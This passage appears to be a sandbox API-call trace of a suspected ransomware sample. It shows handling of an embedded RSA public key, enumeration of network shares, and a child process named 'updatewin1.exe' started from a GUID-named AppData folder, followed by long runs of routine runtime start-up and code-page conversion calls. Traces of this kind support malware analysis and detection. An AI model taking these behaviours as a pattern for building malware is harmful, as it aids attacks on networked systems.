lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.704] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x338e688 | out: hHeap=0x730000) returned 1 [0106.704] lstrlenA (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 42 [0106.704] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x56) returned 0x3343588 [0106.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfdaa778, cbMultiByte=-1, lpWideCharStr=0x3343588, cchWideChar=43 | out: lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned 43 [0106.705] lstrcpyW (in: lpString1=0x521cf0, lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" | out: lpString1="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}") returned="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk\"}" [0106.705] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0106.705] lstrlenW (lpString="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned 40 [0106.714] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33783b8 | out: hHeap=0x730000) returned 1 Thread: id = 96 os_tid = 0x974 [0108.592] timeGetTime () returned 0x114cb3c [0108.592] GetLastError () returned 0x54f [0108.592] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3bc) returned 0x33b83b8 [0108.593] GetCurrentThreadId () returned 0x974 [0108.593] SetLastError (dwErrCode=0x54f) [0108.593] Sleep (dwMilliseconds=0x1d4c0) Thread: id = 97 os_tid = 0x984 [0108.593] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x9fafee0 | out: lphEnum=0x9fafee0*=0x334ad80) returned 0x0 [0109.702] WNetEnumResourceW (in: hEnum=0x334ad80, lpcCount=0x9fafedc, lpBuffer=0x9c063a0, lpBufferSize=0x9fafed8 | out: lpcCount=0x9fafedc, lpBuffer=0x9c063a0, lpBufferSize=0x9fafed8) returned 0x0 [0109.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398918 [0109.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398960 [0109.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x70) returned 0x338d808 [0109.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33989a8 [0109.702] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33989f0 [0109.703] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x9c063a0, lphEnum=0x9fafe28 | out: lphEnum=0x9fafe28*=0x3314f98) returned 0x0 [0109.784] WNetEnumResourceW (in: hEnum=0x3314f98, lpcCount=0x9fafe24, lpBuffer=0x33b3f78, lpBufferSize=0x9fafe20 | out: lpcCount=0x9fafe24, lpBuffer=0x33b3f78, lpBufferSize=0x9fafe20) returned 0x103 [0109.784] WNetCloseEnum (hEnum=0x3314f98) returned 0x0 [0109.784] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398960 | out: hHeap=0x730000) returned 1 [0109.784] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398918 | out: hHeap=0x730000) returned 1 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398918 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398960 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xe0) returned 0x33a9b90 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33984e0 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3398408 [0109.784] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33989f0 | out: hHeap=0x730000) returned 1 [0109.784] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33989a8 | out: hHeap=0x730000) returned 1 [0109.784] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x338d808 | out: hHeap=0x730000) returned 1 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33989a8 [0109.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x33989f0 [0109.784] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x9c063c0, lphEnum=0x9fafe28) Thread: id = 98 os_tid = 0x9b4 Process: id = "7" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" page_root = "0x478b5000" os_pid = "0x994" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 99 os_tid = 0x9a4 [0111.181] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x1e3b9160, dwHighDateTime=0x1d5fd35)) [0111.181] GetCurrentProcessId () returned 0x994 [0111.181] GetCurrentThreadId () returned 0x9a4 [0111.181] GetTickCount () returned 0x114cec4 [0111.181] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23142578809) returned 1 [0111.203] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.203] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f10000 [0111.208] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.208] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0111.208] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0111.208] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0111.208] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0111.208] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.208] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.209] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.209] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.209] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.209] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.210] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.210] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.211] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.211] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x214) returned 0x1f107d0 [0111.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.211] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0111.211] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0111.211] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0111.212] GetCurrentThreadId () returned 0x9a4 [0111.212] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0111.212] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x800) returned 0x1f109f0 [0111.212] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0111.212] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.212] SetHandleCount (uNumber=0x20) returned 0x20 [0111.212] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe\" " [0111.212] GetEnvironmentStringsW () returned 0x524e70* [0111.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0111.213] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x0, Size=0x565) returned 0x1f111f8 [0111.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1f111f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0111.213] FreeEnvironmentStringsW (penv=0x524e70) returned 1 [0111.213] GetLastError () returned 0x0 [0111.213] SetLastError (dwErrCode=0x0) [0111.213] GetLastError () returned 0x0 [0111.213] SetLastError (dwErrCode=0x0) [0111.213] GetLastError () returned 0x0 [0111.213] SetLastError (dwErrCode=0x0) [0111.213] GetACP () returned 0x4e4 [0111.213] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x0, Size=0x220) returned 0x1f11768 [0111.213] GetLastError () returned 0x0 [0111.213] SetLastError (dwErrCode=0x0) [0111.213] IsValidCodePage (CodePage=0x4e4) returned 1 [0111.213] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0111.213] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0111.214] GetLastError () returned 0x0 [0111.214] SetLastError (dwErrCode=0x0) [0111.214] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.214] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0111.214] GetLastError () returned 0x0 [0111.214] SetLastError (dwErrCode=0x0) [0111.214] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ") returned 256 [0111.214] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.214] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0111.214] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿµæ…}\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.214] GetLastError () returned 0x0 [0111.214] SetLastError (dwErrCode=0x0) [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.214] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ") returned 256 [0111.214] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0111.215] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䁒䁛㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0111.215] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f 